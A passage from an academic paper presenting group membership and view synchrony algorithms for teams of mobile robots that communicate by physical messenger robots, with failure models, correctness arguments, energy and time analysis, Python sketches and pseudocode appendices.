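The redundancy argument above can be sketched as follows: dispatching $f+1$ messengers, each carrying a full copy of the message, tolerates up to $f$ messenger crashes. This is an illustrative Python sketch; `MAX_FAULTY` and all names are assumptions, not the paper's notation.

```python
MAX_FAULTY = 2  # assumed system-wide bound f on crashed messengers

def dispatch(message, max_faulty=MAX_FAULTY):
    """Send max_faulty + 1 messenger robots, each carrying a full
    copy of the message; at least one survives by assumption."""
    return [("messenger-%d" % i, message) for i in range(max_faulty + 1)]

def deliver(dispatched, crashed):
    """Copies carried by non-crashed messengers reach the receiver."""
    return [msg for (mid, msg) in dispatched if mid not in crashed]

batch = dispatch("join-request")
# Even if f = 2 of the 3 messengers crash en route,
# one copy is still delivered.
delivered = deliver(batch, {"messenger-0", "messenger-2"})
```

The cost of this scheme is linear in $f$: every logical message consumes $f+1$ physical messengers from the team's pool, which is why the paper later accounts for the energy and time overhead per failure model.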
On the other hand, there is a failure detection technique specific to distributed systems composed of teams of mobile robots communicating by messengers, which differs from conventional failure detection mechanisms. It is well known that it is impossible to correctly and deterministically detect a process crash in purely asynchronous distributed systems [5], because it is impossible to distinguish a crashed process from a very slow one. But in a context of robots communicating by physical messengers, the crash of a team can be detected locally at its site by at least one correct messenger, and consequently the system is augmented with a perfect failure detector.
**Example** Let us illustrate the motivation of this approach with a simple example. Consider a distributed application composed of a group of teams of cooperative mobile robots searching for mineral objects inside a mine. In this underground setting there is no established radio communication infrastructure, and it is impractical to deploy a radio communication system (e.g., [2]) in this environment. Using ultrasonic media is likewise not feasible. Communicating via infrared technology (e.g., [7]) could compensate for the absence of radio infrastructure, but it requires a line of sight between communicating robots, and signals can be interrupted by moving obstacles.
It is therefore convenient to communicate by physical robot messengers in such applications, and in similar environments such as underwater and space applications. Communication by messengers could also be used to tolerate catastrophic crashes of an entire radio or infrared communication system between teams of robots.
**Group Membership and View Synchrony** In a distributed system composed of teams of mobile robots, in the presence of failures, it is desirable to establish a group membership and view synchrony protocol to:
- Allow teams to join and/or leave a group in a consistent manner.
- Enable teams to install a new view such that all teams in the system agree on every new installed view.
So, a group membership and view synchrony protocol must generate an ordered sequence of consistent views.
**Definitions** We define a group as a set of teams which are said to be members of the group. A team becomes a group member by requesting to *join* the group; it can cease being a member by requesting to *leave* the group. A view is the output of membership service, consisting of the list of the current members in the group, and a sequence number.
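The definitions above can be captured by a small data type. This is a Python sketch; the field and function names are illustrative, not the paper's notation: a view pairs the current member set with a sequence number, and join/leave requests each produce the next view in the sequence.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class View:
    """A membership view: the current group members plus a sequence
    number identifying its position in the ordered view sequence."""
    seq: int
    members: frozenset

def join(view, team):
    """A team requests to join: the next view includes it."""
    return View(view.seq + 1, view.members | {team})

def leave(view, team):
    """A team requests to leave: the next view excludes it."""
    return View(view.seq + 1, view.members - {team})

v0 = View(0, frozenset({"teamA", "teamB"}))
v1 = join(v0, "teamC")   # View(seq=1, members={teamA, teamB, teamC})
v2 = leave(v1, "teamA")  # View(seq=2, members={teamB, teamC})
```

The view is immutable (`frozen=True`) to reflect that installed views are never edited in place; the protocol's job is to make every correct team install the same sequence `v0, v1, v2, ...`.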
**Contribution** In this paper, we define a distributed system composed of teams of cooperative autonomous mobile robots in which inter-team communication (“communication between teams”) occurs by sending robot messengers.
We assume that the system is completely connected, so there exists a “communication route” between each pair of teams, and every team has a pool of robot messengers for sending messages to other teams. In our system model, a group is a set of teams communicating by robot messengers. We present and discuss a distributed algorithm for group membership and view synchrony in this system model, which is prone to messenger failures and team failures.
We handle the *join* of a new team to a group, the *leave* of a team, and the establishment and confirmation of a new view in the system. We discuss three failure models: the first assumes that both messengers and teams are correct; the second handles messenger failures assuming that all teams are correct; and the third, most general, model considers both messenger and team failures.
We present a group membership algorithm and give arguments showing its correctness; we then briefly evaluate the energy and time required to run the algorithm in each failure model.
**Related work** Group membership and view synchrony protocols exist for conventional distributed systems. Schemmer et al. [9] developed an architecture allowing mobile systems to schedule shared resources in real time based on wireless communications. They present two membership protocols which allow mobile systems to join and leave a group with predictable delay at any time; these protocols dynamically allocate bandwidth to joining stations. Their approach aims at solving the problem of congestion in traffic control systems. In brief, many protocols have been presented (e.g., [1, 4, 8, 9]) based on different scheduling techniques to allocate shared resources, such as bandwidth, to joining stations in dynamically changing groups.
Abstractions of the existing group membership and view synchrony protocols for traditional distributed systems cannot be adapted to our distributed system model. The mobile-agent approach, on the other hand, is based on software migration, so an agent can easily be replicated; in our model, however, a messenger is a physical entity. The mobile-agent approach therefore does not meet our system model and requirements.
**Structure** The rest of the paper is organized as follows. Section 2 describes the system model and the basic concepts and assumptions. Section 3 describes the three failure models: failure-free, messenger failure, and combined team/messenger failure. Section 4 describes our group membership algorithm, with correctness arguments and a behavior evaluation for each failure model, and Section 5 concludes the paper.
2 System model & definitions
2.1 System model
We consider a distributed system composed of a group of $n$ teams of autonomous mobile robots and $m$ messengers, with $n, m > 1$. These teams cooperate with each other to achieve a required task determined by the upper layer. The system is purely asynchronous: there are no bounds on the speeds at which teams process information, nor on message delays. Teams communicate with each other by exchanging robot messengers. Figure 1 illustrates our system model.
We assume that there exists a “communication route” between each pair of teams, such that each team can communicate directly with other teams, and the system is completely connected.
The system $(S)$ is a group of teams $S = \{T_1, T_2, \ldots, T_n\}$. Every team has an identifier, a set of robots named “workers” responsible for executing the required tasks, and a pool of robot messengers.
In this model, a robot messenger is ready to transmit messages on behalf of its team and also on behalf of other teams, and we assume that the capacity of memory of a messenger is large enough such that it can carry all available messages.
When a team receives a message, the cardinality of its pool is incremented by one, and it is decremented by one when it sends a message. We assume that each messenger has enough energy to move two hops at most, after that it requires a power supply from any team in the system.
2.2 Metrics
In addition to the complexity metrics used in traditional distributed systems, we consider a new metric that we call energy complexity.
Roughly speaking, the energy complexity of an algorithm $A$ measures the total amount of energy spent by a single run of the algorithm. The energy is evaluated by counting the number of hops\footnote{We call “hop” the journey from one team to another made by some messenger.} that must be made by messengers until the algorithm terminates.
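As an illustration (a minimal sketch of ours, not part of the paper's algorithms), the two-hop energy budget of Sec. 2.1 and the hop-counting metric can be expressed as:

```python
class Messenger:
    """A messenger may move at most two hops before it must recharge (Sec. 2.1)."""
    MAX_HOPS_PER_CHARGE = 2

    def __init__(self, name):
        self.name = name
        self.charge = self.MAX_HOPS_PER_CHARGE
        self.total_hops = 0  # contribution to the run's energy complexity

    def hop(self, src, dst):
        # One hop: the journey from team `src` to team `dst`.
        if self.charge == 0:
            raise RuntimeError(f"{self.name} needs a power supply at {src}")
        self.charge -= 1
        self.total_hops += 1

    def recharge(self):
        # A power supply obtained from any team in the system.
        self.charge = self.MAX_HOPS_PER_CHARGE

def energy(messengers):
    """Energy complexity of a run = total number of hops made by all messengers."""
    return sum(m.total_hops for m in messengers)

m = Messenger("m1")
m.hop("T1", "T2"); m.hop("T2", "T3")
m.recharge()        # power supply at T3
m.hop("T3", "T1")
print(energy([m]))  # 3
```

The team names are illustrative; only the hop-counting and the two-hop budget mirror the model.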
### 2.3 Group membership & view synchrony
The membership service maintains a list of the currently active connected processes in failure-prone distributed systems, and delivers this information to the application whenever it changes. The reliable multicast services deliver messages to the current view members. For more information on the subject, we refer to the survey of Chockler et al. \cite{3}. A group membership service can also be seen as a high-level failure detection mechanism that provides consistent information about suspicions and failures \cite{6, 10}. In short, group membership keeps track of which processes belong to the distributed computation and which do not.
In a distributed system composed of teams of robots communicating by messengers, a group membership service provides a list of the non-crashed teams that currently belong to the system, and satisfies three properties: validity, agreement, and termination. Validity is explained as follows: let $v_i$ and $v_{i+1}$ be two consecutive views; if a team $T \in v_i \setminus v_{i+1}$ then some team has executed $\text{leave}(T)$, and if a team $T \in v_{i+1} \setminus v_i$ then some team has executed $\text{join}(T)$. The agreement property ensures that the same view is installed by all the teams of the group (agreement on the view), since agreement on uniquely identified views is necessary for synchronizing communications. Termination means that if a team $T_p$ executes $\text{join}(T_q)$, then unless $T_p$ crashes, eventually a view $v'$ is installed such that either $T_q \in v'$ or $T_p \notin v'$. We use the following notations in the paper:
- $|T_i|$ is the number of messengers in the pool of team $T_i$.
- *initiator* is the team which proposes a (join) or a (leave) operation, and consequently initiates the procedure of creating a new view.
- logical ring is a logical circular list of teams identifiers.
- $v_{ini}$ is the initial view of the system.
- $v_{act}$ is the current view of the system.
- $v_{fin}$ is the resulting view of the system.
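As a small illustration (our sketch, not part of the paper), the validity property can be phrased as an executable check on two consecutive views, given the sets of teams for which some join() or leave() was executed between them:

```python
def valid_transition(v_cur, v_next, joins, leaves):
    """Validity (Sec. 2.3): a team disappears from a view only via leave(),
    and appears in a view only via join()."""
    removed = v_cur - v_next
    added = v_next - v_cur
    return removed <= leaves and added <= joins  # set-inclusion checks

v1 = {"T1", "T2", "T3"}
v2 = {"T1", "T2", "Tp"}
print(valid_transition(v1, v2, joins={"Tp"}, leaves={"T3"}))  # True
print(valid_transition(v1, v2, joins=set(), leaves={"T3"}))   # False: Tp appeared with no join()
```

The view contents here echo the worked example of Sec. 4.1.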
### 3 Failure Models
We consider that a messenger and a team fail by “crash”, and discuss three possible failure models. In Model A, we assume that all messengers and teams are correct. In Model B we consider the crash of messengers only, while all teams are correct. Model C presents the most general case, which considers both team and messenger crashes.
#### 3.1 Model A: Failure-free
Model A considers the failure-free case: in this model there is neither crash of messengers nor crash of teams. Model A is specified by the two following properties:
- property A1: All messengers are correct.
- property A2: All teams are correct.
#### 3.2 Model B: Messenger failure
In this model, we consider failures of messengers only, so a robot messenger may fail by crash while it moves between teams carrying messages (there is no crash of teams in Model B).
We assume that the number of faulty messengers is bounded, and denote this upper bound by $\overline{M}$. Model B is specified by the two following properties:
- property B1: A messenger can fail by crash, and when it crashes, this crash is permanent.
- property B2: A whole team of robots never crashes, so all the teams in the system are correct.
3.3 Model C: Team/messenger failure
In this model, the system contains some faulty teams and some faulty messengers. We assume that the number of faulty teams and faulty messengers is bounded; we denote the maximal numbers of faulty teams and messengers in the system by \((\overline{T}, \overline{M})\).
In this model we have the following properties:
- **Property C1**: A whole team(s) may fail by crash and when a team crashes, this crash is permanent.
- **Property C2**: A correct messenger never crashes while doing its job of carrying messages between teams, but if its team has crashed and it was inside it at the moment of the crash, then the correct messenger crashes with its team. Correct messengers that were outside their teams never crash.
- **Property C3**: The crash of a team implies the crash of all the robots inside that team, the crashed robots can be classified in two categories: the workers of the crashed team, and its messengers either faulty or correct which are still inside the team at the moment of crash.
- **Property C4**: There is at least one correct team, and at least one correct robot messenger in the system; we can express this condition as follows: \(\overline{T} < n\) and \(\overline{M} < m\).
- **Property C5**: Any set composed of \(\overline{T}\) teams should contain in total at most \(m - \overline{M} - 1\) robot messengers, at any instant. This condition can be formalized as follows: \(\sum_{k=1}^{\overline{T}} |T_k| \leq m - \overline{M} - 1\).
The intuition underlying this condition (Property C5) is that it guarantees that at least one correct robot messenger remains in the system even if \(\overline{T}\) simultaneous team crashes occur.
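Property C5 can be checked executably: since the condition must hold for *any* set of \(\overline{T}\) teams, it suffices to test the \(\overline{T}\) teams with the largest pools. A sketch (the `pools` mapping and the numbers are illustrative assumptions):

```python
def satisfies_C5(pools, m, T_bar, M_bar):
    """Property C5: any T_bar teams hold at most m - M_bar - 1 messengers.
    Checking the T_bar largest pools covers every possible subset."""
    worst = sum(sorted(pools.values(), reverse=True)[:T_bar])
    return worst <= m - M_bar - 1

# m = 6 messengers total, at most M_bar = 1 faulty messenger, T_bar = 2 faulty teams
pools = {"T1": 2, "T2": 1, "T3": 2, "T4": 1}
print(satisfies_C5(pools, m=6, T_bar=2, M_bar=1))  # True: 2+2 = 4 <= 6-1-1 = 4
print(satisfies_C5(pools, m=5, T_bar=2, M_bar=1))  # False: 4 > 5-1-1 = 3
```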
4 Group Membership and View Synchrony algorithms
In this section, we study the problem of group membership and view synchrony in our system model, considering the three precedent failure models. The algorithms for models (A, B, C) are presented in the appendix.
For each failure model, we give a brief explanation and illustrate our algorithm by an example, then we give arguments showing its correctness, and finally we evaluate the energy and time required to run the algorithm.
We represent the system as a logical ring of nodes sorted in increasing order of team identifiers; each node in the ring represents a team of robots, and the initial view contains all the teams in the system.
4.1 Group membership & failure-free (Model A)
We study the group membership and view synchrony in our system model, free of failures.
4.1.1 Description of the algorithm (Model A)
- **Condition**: The team initiator has at least one messenger in its pool.
We illustrate the group membership algorithm in the failure-free case by the following simple example:
Consider a system composed of three teams; we construct a logical ring of nodes \(\{T_1, T_2, T_3\}\). The initial view is \(\{T_1, T_2, T_3\}\). We suppose that team \(T_2\) starts to propose a new view (team initiator) and invokes a \(join(T_p)\) operation, team \(T_3\) invokes a \(leave(T_3)\) operation, and \(T_1\) does not execute any operation.
Team \(T_2\) starts the propose round by sending a messenger to \(T_3\), the next team in the logical ring. The messenger transports a message which proposes the view \(v^i_{T_2} = \{T_1, T_2, T_3, T_p\}\).
When the team \(T_3\) receives this message, it behaves as follows:
1. generates its own message: \(T_3, leave(T_3)\)
2. merges $msg_{T_2}$ and $msg_{T_3}$ then proposes the view $v^i_{T_3} = \{T_1, T_2, T_p\}$.
3. sends a messenger to $T_1$, with the new view $v^i_{T_3}$.
When team $T_1$ receives the messenger, it behaves in the same manner as before, with the difference that $T_1$ does not change anything: it acknowledges the current proposed view and sends a messenger to $T_2$, which terminates the propose round and starts the commit round.
$T_2$ starts the commit round by sending the message \textit{commit}\{$T_1, T_2, T_p$\} to $T_3$ which acknowledges the current view $v^i$ and sends a messenger to the next team.
The algorithm terminates when $T_2$ receives back the commit message that it has sent; the group membership algorithm then terminates successfully, such that team $T_p$ has joined the group, $T_3$ has left it, and the new view is $v_{fin} = \{T_1, T_2, T_p\}$.
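The run above can be simulated. The sketch below (data layout and function name are ours) walks one messenger around the logical ring, merging join/leave requests in the propose round and circulating the agreed view in the commit round:

```python
def model_a(ring, initiator, ops):
    """Failure-free group membership (Model A). `ops[T]` is an optional
    ("join", X) or ("leave", T) request held by team T."""
    n = len(ring)
    start = ring.index(initiator)
    order = [ring[(start + k) % n] for k in range(n)]  # initiator first
    view = set(ring)
    hops = 0
    # Propose round: one messenger visits every team and merges its request.
    for team in order:
        request = ops.get(team)
        if request:
            kind, arg = request
            view = view | {arg} if kind == "join" else view - {arg}
        hops += 1  # hop to the next team in the ring
    # Commit round: circulate the agreed view back around the ring.
    hops += n
    return sorted(view), hops

view, hops = model_a(["T1", "T2", "T3"], "T2",
                     {"T2": ("join", "Tp"), "T3": ("leave", "T3")})
print(view)  # ['T1', 'T2', 'Tp']
print(hops)  # 6, i.e. 2n hops as in the evaluation of Sec. 4.1.3
```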
### 4.1.2 Correctness arguments (Model A)
In this model, both messengers and teams are correct. This guarantees the correctness of the communications between teams, so all messages sent by a team are correctly received by the destination team; it also proves the correct termination of the algorithm, since a messenger is guaranteed to return to the initiator after both the propose and the commit rounds.
We show that the three properties of the group membership protocol are satisfied by our algorithm.
1. Validity: According to algorithm A, the removal of a team from a view is impossible unless some team executes the operation \textit{leave}(). Likewise, a new team can appear in a view only if some team executes the operation \textit{join(new-team)}.
2. Agreement: The commit round of the algorithm circulates the same view $v_{fin}$ to all the teams, so the new view is $v_{fin}$, and after the termination of the algorithm, any two teams install the same view.
3. Termination: When a team $T_p$ executes \textit{join($T_q$)}, this request is broadcast to the teams that follow $T_p$ in the logical ring during the propose round, and then all the teams in the system agree on \textit{join($T_q$)} via the commit round. So, eventually a view $v'$ is installed such that $T_q \in v'$.
### 4.1.3 Behavior Evaluation (Model A)
The algorithm executes two rounds, propose and commit. Since there are no failures in this model, the messenger performs $2n$ hops between the teams in order to define a new view. In Model A, the energy and time required are thus both of the order $O(2n)$.
### 4.2 Group membership & messengers failure (Model B)
We study the group membership and view synchrony in our system model, in presence of messengers failure.
#### 4.2.1 Description of the algorithm (Model B)
- **Condition**: The team initiator initially has at least $(\overline{M} + 1)$ messengers in its pool.
In Model B, the team initiator executes the propose and commit rounds by sending a set of messengers, at least one of which is correct. We illustrate the algorithm with the same example as in Model A:
Team $T_2$ starts the propose round by sending a set of $(\overline{M} + 1)$ messengers to $T_3$, such that each messenger carries the same message, which proposes the view $v^i_{T_2} = \{T_1, T_2, T_3, T_p\}$.
When the team $T_3$ receives this set of messengers (or at least one), it behaves as follows:
1. unifies all the identical messages received from $T_2$.
2. generates its own message: $T_3$.\textit{leave($T_3$)}.
3. merges $msg_{T_2}$ and $msg_{T_3}$, then proposes the view $v^i_{T_3} = \{T_1, T_2, T_p\}$.
4. sends the set of messengers that it has received to $T_1$, with the new view $v^i_{T_3}$.
When \( T_1 \) receives the set of messengers from \( T_3 \), it does not change the view: it acknowledges the current proposed view and sends the messengers to \( T_2 \), which terminates the propose round and starts the commit round once it receives at least one messenger from \( T_1 \). \( T_2 \) starts the commit round by sending the same set of messengers with the message \( \text{commit}\{T_1, T_2, T_p\} \) to \( T_3 \), which acknowledges the current view and sends the set to \( T_1 \).
The algorithm terminates when \( T_2 \) receives back at least one messenger of this set carrying the commit message that it has sent; the group membership algorithm then terminates successfully, such that team \( T_p \) has joined the group, \( T_3 \) has left it, and the new view is \( v_{fin} = \{T_1, T_2, T_p\} \).
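The redundancy argument can be sketched as follows: the initiator dispatches \(\overline{M}+1\) identical copies, at most \(\overline{M}\) of them may crash, and the receiving team unifies whatever survives (names and message format are illustrative assumptions of ours):

```python
def deliver(copies, crashed_ids):
    """A team receives the surviving copies and unifies identical messages."""
    survivors = [msg for i, msg in copies if i not in crashed_ids]
    assert survivors, "bound M_bar violated: all copies crashed"
    unified = set(survivors)
    assert len(unified) == 1  # every copy carried the same message
    return unified.pop()

M_bar = 2
copies = [(i, "propose {T1,T2,T3,Tp}") for i in range(M_bar + 1)]
# Worst case: exactly M_bar messengers crash; one copy still gets through.
print(deliver(copies, crashed_ids={0, 1}))  # propose {T1,T2,T3,Tp}
```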
4.2.2 Correctness arguments (Model B)
The condition \( |\text{initiator}| \geq (\overline{M} + 1) \) guarantees that the team initiator has at least one correct messenger; we show that this condition ensures the correct termination of the algorithm.
In Model B, we need to send \((\overline{M} + 1)\) messengers from the initiator to the next team in order to guarantee the correct reception of messages by the next team, supposing that all the teams are correct (the assumption of this failure model).
The cardinality of this set remains between \(1\) and \((\overline{M} + 1)\), because some messengers may crash before reaching their destinations; this set of messengers is responsible for all the communications between the teams, during both the propose and commit rounds, until it returns to the initiator.
The algorithm guarantees that the same new view is acknowledged by all the teams in the system, since there is no team crash in this model.
The properties: Validity, Agreement, and Termination are discussed exactly as in the previous failure-free model.
4.2.3 Behavior Evaluation (Model B)
The initiator sends a set of \((\overline{M} + 1)\) messengers, and this same set performs \( 2n \) hops between the teams, so the energy consumed is of the order \( O(2(\overline{M} + 1)n) \). The time required, however, is the same as in Model A, because the robots move simultaneously; the time required to run the algorithm is therefore \( O(2n) \).
4.3 Group membership & teams and messengers failure (Model C)
We study the algorithm of group membership in presence of both teams and messengers failure.
4.3.1 Description of the algorithm (Model C)
- **Condition 1**: The team initiator is a correct team.
- **Condition 2**: The team initiator has initially at least \((\bar{M} + 1)\) messengers in its pool.
We illustrate the group membership algorithm by the following simple example:
Consider a system composed of four teams; we construct a logical ring of nodes \( \{T_1, T_2, T_3, T_4\} \). The initial view is \( \{T_1, T_2, T_3, T_4\} \). We suppose that team \( T_2 \) starts to propose a new view (team initiator) and invokes a \( \text{join}(T_p) \) operation; for simplicity we suppose that the other teams do not execute any operation, and that teams \( T_1 \) and \( T_3 \) are faulty.
**propose round** Team \( T_2 \) starts the propose round by sending a set composed of \((\overline{M} + 1)\) messengers to \( T_3 \), such that each messenger in the set carries the same message, which proposes the view \( v^i_{T_2} = \{T_1, T_2, T_3, T_4, T_p\} \). When this set of messengers arrives at the site of \( T_3 \), it performs a crash detection protocol based on hand-shaking with all the workers of \( T_3 \). Two cases arise:
- **\( T_3 \) has crashed**: the set of messengers returns back to \( T_2 \) indicating the crash of \( T_3 \), then the initiator changes the current view by removing \( T_3 \) from the group (forced leave) and sends this set of messengers to \( T_4 \) provided with the current proposed view \( v^i_{T_2} = \{T_1, T_2, T_4, T_p\} \).
• $T_3$ is alive: it unifies the identical messages, and sends the set of messengers to $T_4$, as in Model B.
The propose round terminates when the team initiator receives back its set of messengers (or part of it).
**commit round** $T_2$ starts the commit round by sending the set of messengers with the message $\text{commit}\{T_1, T_2, T_4, T_p\}$ to $T_4$, which acknowledges the current view $v'$ and sends the set to $T_1$. When the messengers arrive at the site of $T_1$, two cases arise:
• $T_1$ has crashed: the set of messengers returns back to $T_2$ indicating the crash of $T_1$, then the initiator changes the current view by removing $T_1$ from the group (forced leave) and restarts the commit round by sending this set of messengers to $T_4$ again, provided with the current commit view $v^p = \{T_2, T_4, T_p\}$. Then $T_4$ acknowledges the commit view and sends the messengers to $T_2$.
• $T_1$ is alive: it unifies the identical messages, and sends the set of messengers to $T_2$, as in Model B.
The algorithm terminates when $T_2$ receives back at least one messenger belonging to the set it has sent, provided with the commit message; the group membership algorithm then terminates successfully, such that team $T_p$ has joined the group, $(T_1, T_3)$ have left it because of their crashes, and the new view is $v_{fin} = \{T_2, T_4, T_p\}$.
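The forced-leave behavior can be sketched as a simplified simulation (ours, abstracting the two rounds into a single view-fixing pass around the ring; the hop accounting is approximate):

```python
def model_c_walk(ring, initiator, crashed, joins):
    """Simplified Model C sketch: one pass around the logical ring with
    forced leaves for crashed teams. Returns (final view, hops made)."""
    view = set(ring) | set(joins)
    n = len(ring)
    start = ring.index(initiator)
    hops = 0
    for k in range(1, n):
        team = ring[(start + k) % n]
        hops += 1                # hop towards `team`
        if team in crashed:
            hops += 1            # the messengers return to the initiator
            view.discard(team)   # forced leave of the crashed team
    hops += 1                    # final hop back to the initiator
    return sorted(view), hops

view, hops = model_c_walk(["T1", "T2", "T3", "T4"], "T2",
                          crashed={"T1", "T3"}, joins={"Tp"})
print(view)  # ['T2', 'T4', 'Tp'], the final view of the worked example
```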
### 4.3.2 Correctness arguments (Model C)
In this model we have team failures in addition to messenger failures, so we need extra specifications concerning a team correctness.
We show that the two previous conditions guarantee that the algorithm terminates correctly. In our model a messenger can perform at most two hops, so when a messenger moves to a crashed team, the next hop must be to a correct one, or else the messenger would be stranded. The messenger returns to the team initiator after detecting a crashed team, and the initiator is a correct team according to Condition 1, while Condition 2 guarantees that the set of messengers sent by the initiator contains at least one correct messenger. This set performs all the hops between the teams, as discussed for Model B.
In this model, we provide the system with a perfect failure detector, because the detection of a crashed team is carried out by a local hand-shaking mechanism between at least one correct messenger and all the workers of the team. After detecting a crashed team, the messenger moves to the team initiator (a correct team) and proclaims the crashed team; consequently, the crash is detected correctly and deterministically.
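A runnable counterpart of the hand-shake detection (mirroring the `detect_crash` function in the appendix; the `alive` predicate stands in for the physical hand-shake):

```python
def detect_crash(workers, alive):
    """Perfect failure detection by local hand-shaking: the team is declared
    crashed only if no worker answers the hand-shake."""
    for w in workers:
        if alive(w):
            return False  # the team is still alive
    return True

team_T3 = ["w1", "w2", "w3"]
print(detect_crash(team_T3, alive=lambda w: False))      # True: T3 has crashed
print(detect_crash(team_T3, alive=lambda w: w == "w2"))  # False: w2 answered
```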
The commit round provides each non-crashed team with the most recent view, because the initiator restarts the commit round whenever it detects a crashed team; the commit round therefore terminates correctly by delivering the same view $v_{fin}$ to all non-crashed teams.
The properties: Validity, Agreement, and Termination are discussed exactly as in the Model A.
### 4.3.3 Behavior Evaluation (Model C)
The set of $(\overline{M} + 1)$ messengers may perform additional hops because of team failures, since the set must go back to the initiator whenever it detects a crashed team (up to $\overline{T}$ additional hops in the propose round, and up to $n \cdot \overline{T}$ hops during the commit round).
The energy consumed by messengers is calculated as follows:
- Propose round (worst case): $(n + \overline{T})(\overline{M} + 1)$.
- Commit round (worst case): $n \cdot \overline{T}(\overline{M} + 1)$.
The total energy consumption is $(\overline{M} + 1)(\overline{T} + 1) \cdot n + \overline{T}(\overline{M} + 1)$.
The behavior evaluation in terms of energy can be written as: $O(\alpha \cdot n + \beta)$.
The behavior in terms of time is $(\overline{T} + 1) \cdot n + \overline{T}$; it can also be expressed as $O(\lambda \cdot n + \mu)$.
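As a worked check of these bounds (the numbers are ours): with \(n = 4\), \(\overline{M} = 1\), \(\overline{T} = 2\), the worst-case propose and commit costs add up exactly to the closed form for the total energy:

```python
n, M_bar, T_bar = 4, 1, 2

propose = (n + T_bar) * (M_bar + 1)  # worst-case propose round: 12
commit = n * T_bar * (M_bar + 1)     # worst-case commit round: 16
closed = (M_bar + 1) * (T_bar + 1) * n + T_bar * (M_bar + 1)

print(propose + commit)  # 28
print(closed)            # 28: the two expressions agree
time_bound = (T_bar + 1) * n + T_bar
print(time_bound)        # 14
```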
**Discussion** The energy and time required to run the algorithm increase as the fault tolerance requirements become harder. In Model A the algorithm requires energy and time proportional to $2n$, where $n$ is the size of the system (the group of teams). In Model B the energy becomes more significant than in Model A: it is $\overline{M}$ times greater, which is justified by the cost required to tolerate messenger failures, but the execution time is equivalent to that of Model A. When the system is prone to team failures in addition to messenger failures (Model C), the required energy is \((\overline{M} \cdot \overline{T})\) times greater than in Model A, while the execution time is only \(\overline{T}\) times greater.
5 Conclusion
We have introduced a distributed asynchronous system model composed of a group of teams of cooperative mobile robots. The teams in our model communicate by physical robot messengers. We have presented a group membership algorithm, discussed its correctness, and evaluated its behavior in terms of energy and time, in three possible failure models, the failure-free, the messenger failures, and both team & messenger failures models.
We have shown the conditions that must be satisfied to solve the group membership problem in our system model under each failure model. This technique of communication between teams of robots makes it possible to implement a perfect failure detector, since the detection of a crashed team takes place locally at its site. This property permits solving many agreement problems in asynchronous distributed systems composed of a group of teams of robots.
Furthermore, in this model faulty robot messengers can be mapped to lossy channels in classical distributed systems. We guaranteed reliable communication in Model B by using one set of messengers containing at least one correct messenger; this set circulates the messages and supports all the communications between the teams of the system.
The model presented in our paper can be applied in situations where there are no established communications infrastructures for cooperative mobile robots.
In the future, we also intend to further investigate other distributed algorithms for cooperative autonomous mobile systems.
Acknowledgments
This research was conducted for the program “Fostering Talent in Emergent Research Fields” in Special Coordination Funds for Promoting Science and Technology by the Japan Ministry of Education, Culture, Sports, Science and Technology.
References
Algorithm of group membership & failure-free
In this section, we present our algorithm of group membership in the case of failure-free (Model A):
Algorithm(A): Group membership (failure-free)
Initial phase
1: \( S \leftarrow \{T_1, T_2, \ldots, T_n\} \)
2: \( v_{ini} \leftarrow \{T_i, i \in [1..n]\} \)
3: \( v_{act} \leftarrow v_{ini} \)
4: \( old_view \leftarrow v_{ini} \)
5: \( msg \leftarrow \emptyset \)
6: \( operation = \{\text{join(new team)}, \text{leave(team)}\} \)
main algorithm \((T_i)\)
7: if \((operation = \text{join(new team)})\) then
8: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \cup \{\text{new team}\}) \)
9: end if
10: if \((operation = \text{leave(team)})\) then
11: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \setminus \{\text{team}\}) \)
12: end if
13: if \((T_i = \text{initiator})\) and \((|\text{initiator}| \geq 1)\) then
14: \( msg\_initiator \leftarrow \text{initiator}(ID) \)
15: \( msg \leftarrow msg \cup \{v_{act}\} \)
16: send a messenger with (msg) to next\((T_i)\)
17: wait until reception of the messenger sent
18: when reception of the messenger sent
19: begin-commit-round()
20: end when
21: end if
22: if \((T_i \neq \text{initiator})\) then
23: \( msg \leftarrow msg \cup \{v_{act}\} \)
24: send the messenger received from previous\((T_i)\) with (msg) to next\((T_i)\)
25: end if
procedure begin-commit-round
26: if \((T_i = \text{initiator})\) then
27: \( v_{fin} \leftarrow v_{act} \)
28: \( msg \leftarrow \text{commit}(v_{fin}) \)
29: send the messenger received from previous\((T_i)\) with (msg) to next\((T_i)\)
30: wait until reception of the messenger sent
31: when reception of the messenger sent
32: terminate-commit-round()
33: end when
34: else
35: send the messenger received from previous\((T_i)\) with (msg) to next\((T_i)\)
36: end if
end procedure
37: \( new\_view \leftarrow v_{fin} \)
Algorithm of group membership & messengers failure
We present in this section, our algorithm of group membership in presence of messenger failures (Model B):
Algorithm(B): Group membership (messengers failure)
Initial phase
1: \( S \leftarrow \{T_1, T_2, \ldots, T_n\} \)
2: \( v_{ini} \leftarrow \{T_i, i \in [1..n]\} \)
3: \( v_{act} \leftarrow v_{ini} \)
4: \( old_view \leftarrow v_{ini} \)
5: \( msg \leftarrow \emptyset \)
6: \( operation = \{\text{join(new team)}, \text{leave(team)}\} \)
main algorithm \((T_i)\)
7: if \((operation = \text{join(new team)})\) then
8: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \cup \{\text{new team}\}) \)
9: end if
10: if \((operation = \text{leave(team)})\) then
11: \( T_i\text{-propose}(v_{act} \leftarrow v_{act} \setminus \{\text{team}\}) \)
12: end if
13: if \((T_i = \text{initiator})\) and \((|\text{initiator}| \geq M + 1)\) then
14: \( msg\_initiator \leftarrow \text{initiator}(ID) \)
15: \( msg \leftarrow msg \cup \{v_{act}\} \)
16: send set of \((M + 1)\) messengers provided with (msg) to next\((T_i)\)
17: wait until reception of the messengers sent
18: when reception of messengers sent
19: begin-commit-round()
20: end when
21: end if
22: if \((T_i \neq \text{initiator})\) then
23: unify all the identical propose messages received from previous\((T_i)\) into one message (msg)
24: \( msg \leftarrow msg \cup \{v_{act}\} \)
25: send the set of messengers received from previous\((T_i)\) provided with (msg) to next\((T_i)\)
26: end if
procedure begin-commit-round
27: if \((T_i = \text{initiator})\) then
28: \( v_{fin} \leftarrow v_{act} \)
29: \( msg \leftarrow \text{commit}(v_{fin}) \)
30: send the set of messengers received from previous\((T_i)\) provided with (msg) to next\((T_i)\)
31: wait until reception of the messengers sent
32: when reception of messengers sent
33: terminate-commit-round()
34: end when
35: else
36: unify all the identical commit messages received from previous\((T_i)\) into one message (msg)
37: send the set of messengers received from previous\((T_i)\) provided with (msg) to next\((T_i)\)
38: end if
end procedure
39: \( new\_view \leftarrow v_{fin} \)
